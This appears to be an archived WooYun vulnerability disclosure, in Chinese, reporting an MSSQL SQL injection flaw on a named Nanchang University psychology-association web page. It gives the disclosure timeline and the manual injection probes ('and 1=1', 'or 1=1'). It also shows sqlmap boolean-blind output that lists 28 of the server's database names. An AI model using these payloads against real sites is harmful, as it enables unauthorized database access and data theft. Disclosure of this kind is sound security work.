乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-15: 细节已通知厂商并且等待厂商处理中 2014-12-15: 厂商已经确认,细节仅向厂商公开 2014-12-25: 细节向核心白帽子及相关领域专家公开 2015-01-04: 细节向普通白帽子公开 2015-01-14: 细节向实习白帽子公开 2015-01-29: 细节向公众公开
MSSQL注射,可跨库
http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46
http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46’
404
http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46 and 1=1
原页面
http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46 and 1=2
404or 1=1 列出所有该数据
带入sqlmap进行注射
---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=46 AND 7998=7998---[22:43:22] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008[22:43:22] [INFO] fetching database names[22:43:22] [INFO] fetching number of databases[22:43:22] [INFO] retrieved: 28[22:43:40] [INFO] retrieved: bzdmj[22:44:26] [INFO] retrieved: cnm[22:44:46] [INFO] retrieved: CommunityElderly[22:46:45] [INFO] retrieved: counter[22:47:34] [INFO] retrieved: cyf[22:47:52] [INFO] retrieved: db_04[22:48:43] [INFO] retrieved: EAlbum[22:49:18] [INFO] retrieved: EMHealth[22:50:16] [INFO] retrieved: ExamArrange[22:51:37] [INFO] retrieved: JLNYB[22:52:19] [INFO] retrieved: jy[22:52:40] [INFO] retrieved: master[22:53:26] [INFO] retrieved: MaticsoftFK[22:54:54] [INFO] retrieved: model[22:55:32] [INFO] retrieved: msdb[22:56:08] [INFO] retrieved: ndxlcp[22:57:01] [INFO] retrieved: plusoft_test[22:58:28] [INFO] retrieved: PrimarySecondary[23:00:30] [INFO] retrieved: psy[23:00:53] [INFO] retrieved: Psychological[23:02:02] [INFO] retrieved: psyq[23:02:45] [INFO] retrieved: ReportServer[23:03:51] [INFO] retrieved: ReportServerTempDB[23:05:45] [INFO] retrieved: RGPsyWeb[23:06:43] [INFO] retrieved: tempdb[23:07:29] [INFO] retrieved: xlzxs[23:08:10] [INFO] retrieved: zjk_xljk[23:09:07] [INFO] retrieved: Zxxavailable databases [28]:[*] bzdmj[*] cnm[*] CommunityElderly[*] counter[*] cyf[*] db_04[*] EAlbum[*] EMHealth[*] ExamArrange[*] JLNYB[*] jy[*] master[*] MaticsoftFK[*] model[*] msdb[*] ndxlcp[*] plusoft_test[*] PrimarySecondary[*] psy[*] Psychological[*] psyq[*] ReportServer[*] ReportServerTempDB[*] RGPsyWeb[*] tempdb[*] xlzxs[*] zjk_xljk[*] Zxx
危害等级:中
漏洞Rank:6
确认时间:2014-12-15 13:21
通知用户处理中
暂无